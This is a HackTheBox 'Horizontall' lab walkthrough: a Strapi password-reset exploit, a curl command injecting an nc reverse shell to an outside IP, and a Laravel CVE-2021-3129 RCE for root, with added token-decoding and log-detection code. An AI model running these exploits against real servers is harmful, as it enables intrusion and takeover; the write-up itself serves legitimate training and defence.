HackTheBox: Horizontall
HTB - HORIZONTALL
ENUMERATION
MACHINE IP
export IP=10.10.11.105
NMAP SCAN RESULT
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Enumerating/Exploring Web Resources
http://10.10.11.105 redirects to http://horizontall.htb/, so add this to /etc/hosts:
echo "10.10.11.105 horizontall.htb" >> /etc/hosts
Nothing found in the web panel.
Trying directory bruteforcing:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.11.105/ -t 100 -x php,txt,js,html,jpg -q
Nothing useful found by directory bruteforcing.
As this is an nginx server acting as a reverse proxy, and the IP was auto-resolved to a hostname when we tried to browse it, the next step is subdomain enumeration/bruteforcing.
Using gobuster for subdomain bruteforcing:
gobuster dns -d horizontall.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 200
- Found interesting Subdomain
Found: api-prod.horizontall.htb
- Add this subdomain to /etc/hosts:
echo "10.10.11.105 api-prod.horizontall.htb" >> /etc/hosts
Nothing interesting found on the subdomain itself.
Trying further directory bruteforcing on this subdomain using gobuster:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://api-prod.horizontall.htb/ -t 100 -x php,txt,js,html,jpg -q
- Found Interesting Directories
/index.html (Status: 200) [Size: 413]
/reviews (Status: 200) [Size: 507]
/users (Status: 403) [Size: 60]
/admin (Status: 200) [Size: 854]
/Reviews (Status: 200) [Size: 507]
/robots.txt (Status: 200) [Size: 121]
/Admin (Status: 200) [Size: 854]
/REVIEWS (Status: 200) [Size: 507]
Checking the directories manually
/reviews (or /Reviews) returns the users' reviews, including their usernames:
[{"id":1,"name":"wail","description":"This is good service","stars":4,"created_at":"2021-05-29T13:23:38.000Z","updated_at":"2021-05-29T13:23:38.000Z"},{"id":2,"name":"doe","description":"i'm satisfied with the product","stars":5,"created_at":"2021-05-29T13:24:17.000Z","updated_at":"2021-05-29T13:24:17.000Z"},{"id":3,"name":"john","description":"create service with minimum price i hop i can buy more in the futur","stars":5,"created_at":"2021-05-29T13:25:26.000Z","updated_at":"2021-05-29T13:25:26.000Z"}]
- Users
wail - id=1
doe - id=2
john - id=3
/users gave 403 (Forbidden).
/robots.txt: nothing found here.
Found one more endpoint using Burp Active Scanning:
/users-permissions/init
- Response from this endpoint:
{"hasAdmin":true}
- So we can infer that the admin account is enabled.
Getting Reverse Shell
- After further research, we found that this Strapi web panel is vulnerable to a password reset vulnerability:
https://www.exploit-db.com/exploits/50239
- Download this exploit and run it; it prints the newly reset password and a JSON Web Token (JWT).
- That bearer token can then be used in the request below to get a reverse shell:
curl -i -s -k -X $'POST' -H $'Host: api-prod.horizontall.htb' -H $'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMxMTY0NjMyLCJleHAiOjE2MzM3NTY2MzJ9.cuZYWzy1Y7hk-ajhlHExSWxDVGbJqkWXmuhxUZzSzG8' -H $'Content-Type: application/json' -H $'Origin: http://api-prod.horizontall.htb' -H $'Connection: close' --data $'{\"plugin\":\"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f)\",\"port\":\"80\"}' $'http://api-prod.horizontall.htb/admin/plugins/install'
- For more details about this, check out this blog:
https://bittherapy.net/post/strapi-framework-remote-code-execution/
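As an added example (not part of the original writeup), the following decodes the claims of the bearer token used in the request above without verifying its signature, the way an operator reviewing Strapi admin tokens would: it shows the isAdmin claim and how long the token stays valid. The max_admin_days policy threshold is an assumption, not a Strapi default.

```python
import base64
import json
from datetime import datetime, timezone

# The bearer token exactly as it appears in the request above.
TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMxMTY0NjMyLCJleHAiOjE2MzM3NTY2MzJ9."
         "cuZYWzy1Y7hk-ajhlHExSWxDVGbJqkWXmuhxUZzSzG8")

def b64url_decode(segment):
    """JWT segments are base64url without padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def decode_jwt_claims(token):
    """Parse header and payload WITHOUT checking the signature.

    Inspection only: nothing here proves the token is genuine, so the result
    must never be used to make an authorization decision."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    signature = b64url_decode(signature_b64)
    return header, payload, signature

def summarize_token(token, max_admin_days=1):
    """Describe the claims an operator reviewing admin tokens cares about.

    max_admin_days is an assumed review policy, not a Strapi default."""
    header, payload, signature = decode_jwt_claims(token)
    issued = datetime.fromtimestamp(payload["iat"], tz=timezone.utc)
    expires = datetime.fromtimestamp(payload["exp"], tz=timezone.utc)
    lifetime_days = (payload["exp"] - payload["iat"]) / 86400
    return {
        "alg": header["alg"],
        "signature_bytes": len(signature),  # 32 for HS256
        "user_id": payload["id"],
        "is_admin": payload.get("isAdmin", False),
        "issued_at": issued.isoformat(),
        "expires_at": expires.isoformat(),
        "lifetime_days": lifetime_days,
        # An admin token that stays valid for weeks is worth flagging in review.
        "long_lived_admin": bool(payload.get("isAdmin")) and lifetime_days > max_admin_days,
    }

if __name__ == "__main__":
    for key, value in summarize_token(TOKEN).items():
        print(f"{key}: {value}")
```

For this token the payload is {"id":3,"isAdmin":true,...} with a 30-day lifetime, which is the kind of long-lived admin credential a server-side session store or short expiry would limit.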
We should now have the reverse shell.
The user flag is at /home/developer/user.txt
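From the defender's side, the chain above leaves a recognisable trail in the nginx access log: a burst of 404s from one client during directory bruteforcing, the probe of /users-permissions/init, and a POST to /admin/plugins/install. The following detector is an added example, not part of the writeup; the log lines it runs over are constructed, and the 404 threshold is an assumed tuning value.

```python
import re
from collections import Counter

# Default nginx combined log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+'
)

# Constructed sample lines (not real traffic), mirroring the steps in the writeup.
SAMPLE_LOG = """\
10.10.14.2 - - [10/Sep/2021:06:01:01 +0000] "GET /backup/ HTTP/1.1" 404 153 "-" "gobuster/3.1.0"
10.10.14.2 - - [10/Sep/2021:06:01:01 +0000] "GET /old.php HTTP/1.1" 404 153 "-" "gobuster/3.1.0"
10.10.14.2 - - [10/Sep/2021:06:01:02 +0000] "GET /test.txt HTTP/1.1" 404 153 "-" "gobuster/3.1.0"
10.10.14.2 - - [10/Sep/2021:06:01:02 +0000] "GET /dev.js HTTP/1.1" 404 153 "-" "gobuster/3.1.0"
10.10.14.2 - - [10/Sep/2021:06:01:03 +0000] "GET /tmp.html HTTP/1.1" 404 153 "-" "gobuster/3.1.0"
10.10.14.2 - - [10/Sep/2021:06:01:03 +0000] "GET /reviews HTTP/1.1" 200 507 "-" "Mozilla/5.0"
10.10.14.2 - - [10/Sep/2021:06:02:10 +0000] "GET /users-permissions/init HTTP/1.1" 200 17 "-" "Mozilla/5.0"
10.10.14.2 - - [10/Sep/2021:06:05:42 +0000] "POST /admin/plugins/install HTTP/1.1" 200 2 "-" "curl/7.74.0"
192.168.1.20 - - [10/Sep/2021:06:06:00 +0000] "GET /reviews HTTP/1.1" 200 507 "-" "Mozilla/5.0"
"""

NOT_FOUND_THRESHOLD = 5  # assumed: 404s from one client before we call it a brute force

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect(log_text, threshold=NOT_FOUND_THRESHOLD):
    """Return (rule, client_ip, detail) tuples for activity worth reviewing."""
    findings = []
    not_found = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if rec["status"] == "404":
            not_found[rec["ip"]] += 1
        # Plugin installation is admin-only and rare in normal operation; review every hit.
        if rec["method"] == "POST" and path.startswith("/admin/plugins/install"):
            findings.append(("strapi_plugin_install", rec["ip"], path))
        # Check for an existing admin account (the {"hasAdmin":true} response seen above).
        if path == "/users-permissions/init":
            findings.append(("strapi_init_probe", rec["ip"], path))
    for ip, count in not_found.items():
        if count >= threshold:
            findings.append(("dir_bruteforce", ip, f"{count} responses with status 404"))
    return findings
```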
PRIVILEGE ESCALATION
Running linpeas.sh, we got some open ports:
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1337 0.0.0.0:* LISTEN 1856/node /usr/bin/
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
- Here port 8000 is listening on localhost only:
curl 0.0.0.0:8000 > index.html
We can see that Laravel is running: Laravel v8 (PHP v7.4.18).
This Laravel version is vulnerable to RCE via CVE-2021-3129.
After further research we found this GitHub repo to exploit the vulnerability:
https://github.com/ambionics/laravel-exploits
Port Forwarding using SSH
Port 8000 is only open locally on the user (hacked) machine, so we need to reach it from our attacker machine. We can use SSH port forwarding for that.
- STEPS TO PORT FORWARDING
- Create an SSH key pair:
ssh-keygen -t rsa
- Put the PUBLIC KEY on the user machine (hacked machine) in /opt/strapi/.ssh/authorized_keys. Here authorized_keys is the file containing the public key (it is not a folder).
- Use the private key from the attacker machine to connect back to the user machine and forward port 8000:
ssh -L 8000:localhost:8000 [email protected] -i keypair
- (Here keypair is the private key generated earlier.)
- Now, after a successful connection, try to browse port 8000 from your machine:
curl 0.0.0.0:8000
This should show the same Laravel page as before, confirming the port forward works. Now we can use the exploit.
- Now we can use the RCE to get the root flag, following the instructions in the GitHub repo. The usage example below is the one given in the repo:
$ php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id
$ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log
Logs cleared
Successfully converted to PHAR !
Phar deserialized
--------------------------
uid=1000(cf) gid=1000(cf) ...
--------------------------
Logs cleared
- Let's modify this to get the root flag:
php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system "cat /root/root.txt"
./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
- Output:
python3 laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
+ Log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !
+ Phar deserialized
--------------------------
d31c599c35924f3afdd3447c96c8ea65
--------------------------
+ Logs cleared
- We now have the root flag.